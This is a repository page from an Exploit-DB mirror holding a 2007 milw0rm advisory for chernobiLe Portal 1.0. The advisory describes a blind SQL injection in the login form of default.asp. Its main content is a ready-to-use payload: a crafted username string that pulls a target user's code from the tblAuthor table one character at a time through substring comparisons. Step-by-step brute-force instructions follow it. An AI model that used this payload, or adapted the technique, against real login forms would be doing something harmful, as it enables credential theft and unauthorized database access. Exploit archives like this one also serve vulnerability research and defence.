bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/asp/webapps/3210.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

40 lines
No EOL
1 KiB
Text
Raw Permalink Blame History

*******************************************************************************
# Title : chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$ : Not Free,Private
# Info : /*
Turk Script Eklememen konusunda guzelce uyarmistim,ukalaca tamam demistin
Fakat hala birsey bulmus gibi bazi sitelerde bu raporlarin basligini
aciyorsun.Urastigin konuda bari acik birakma.Havani atmaya dvm et.
*\
*******************************************************************************
[[SQL]]]
http://[target]/[path]//default.asp (POST Method) [SQL]
Example:
Method: One Char Brute Force Technique
First,Please Register Before:
User:[username]'/**/and/**/(substring((SELECT/**/user_code/**/FROM/**/tblAuthor/**/WHERE/**/username='targetuser'),1,1))='A'/*
Pass:[userpass]
If Login True Then First Character = A
elSe Continue...
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-27]
Reference in a new issue View git blame Copy permalink